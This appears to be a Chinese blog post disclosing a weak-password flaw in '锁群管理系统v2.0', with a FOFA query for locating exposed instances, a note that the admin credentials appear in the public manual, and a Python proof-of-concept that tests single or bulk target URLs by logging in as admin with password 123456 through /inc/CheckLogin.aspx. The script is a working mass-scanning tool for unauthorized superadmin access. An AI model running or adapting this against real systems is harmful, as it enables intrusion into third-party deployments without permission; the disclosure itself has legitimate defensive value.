锁群管理系统v2.0存在弱口令漏洞

简介: 锁群管理系统v2.0存在弱口令漏洞

漏洞简介


FOFA

title="锁群管理系统v2.0"

4a469281b9c2e6c8e407da540b5a06e1.png

漏洞影响

锁群管理系统v2.0

漏洞复现

万能的度娘上查询到锁群管理系统操作手册里面有账号和密码

d268167dd800f2d5cfbe8d79d5fcd528.png

后台界面

396ce309e452f96c525bbe1a8a2b632a.png

在后台登陆界面使用操作手册里面的账号和密码成功的登录后台

687daead93c27277ab7b6236f456fd63.png

直接获得超级管理员的权限

poc


import requests
import sys
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
def lemonlove7():
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file x.txt')
    print('FOFA:title="锁群管理系统v2.0"')
    print('lemonlove7')
if len(sys.argv)==1:
    lemonlove7()
    sys.exit()
p = argparse.ArgumentParser(description='lemonlove7')
p.add_argument('-u','--url',help='输入url',default='')
p.add_argument('-f','--file',help='输入文件',default='')
a = p.parse_args()
url = a.url
file = a.file
headers= {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Cookie':'ASP.NET_SessionId=pjb41rehvxilis32hfgus0r5'
}
if url != '':
    furl = url
    try:
        url =furl+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'
        r= requests.get(url=url,headers=headers,timeout=10,verify=False)
        if r.status_code == 200 and '0' in r.text:
            print(furl+'存在弱口令')
        else:
            print(furl+'不存在弱口令')
    except Exception as e:
        print(furl+'不存在弱口令')
if file !='':
    text =file
    f = open(text,'r+')
    for i in f.readlines():
        url = i.strip()
        if url.startswith('http:') != 1 and url.startswith('https:') != 1:
            url = 'http://' + url
        url1 = url
        url2=url
        try:
            url1 = url+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'
            r =requests.post(url=url1,headers=headers,timeout = 10,verify=False)
            if r.status_code==200 and '0' in r.text:
                print(url2+'存在弱口令')
            else:
                print(url2+'不存在弱口令')
        except Exception as e:
            print(url2+'不存在弱口令')

单个检测如下

640.png

批量检测如下

640.png


相关文章
|
安全 数据安全/隐私保护
渗透攻击实例-后台弱口令
渗透攻击实例-后台弱口令
|
4月前
|
数据安全/隐私保护
超级弱口令检查工具
超级弱口令工具在检测系统漏洞中的作用,包括如何使用和自定义设置。
652 2
|
5月前
|
SQL 安全 应用服务中间件
技术心得记录:弱口令漏洞详解
技术心得记录:弱口令漏洞详解
|
安全 Shell API
绕过反病毒添加管理员用户小结
绕过反病毒添加管理员用户小结
176 0
绕过反病毒添加管理员用户小结
|
安全 前端开发 JavaScript
代码审计——硬编码口令/弱口令详解
代码审计——硬编码口令/弱口令详解
471 0
|
网络安全 数据安全/隐私保护 计算机视觉
《网络安全0-100》口令系统
《网络安全0-100》口令系统
131 0
|
存储 安全 网络安全
《网络安全0-100》口令机制
《网络安全0-100》口令机制
236 0
|
JavaScript 中间件 数据安全/隐私保护
【每日渗透笔记】后台弱口令+未授权尝试
【每日渗透笔记】后台弱口令+未授权尝试
230 0
【每日渗透笔记】后台弱口令+未授权尝试
|
存储 算法 安全
|
监控 安全 搜索推荐
网站后台数据被入侵篡改了如何解决
网站后台被黑客攻击了怎么办,最近接到一个客户的诉求反映说网站被攻击了后台数据总是被篡改和泄露,而且维持这个状况已经很长时间了,了解完才发现原来早期用的是thinkphp系统源码来搭建的网站,代码版本可以来说是非常古董的,而且后台漏洞非常的多,后面找了一个技术来解决这个问题,但是这个过程他又花了不少时间和钱,漏洞修完过段时间又被反反复复的篡改会员数据,于是他们干脆就改成了完全静态的网站,这个方法只能是治标不治本。
509 0
网站后台数据被入侵篡改了如何解决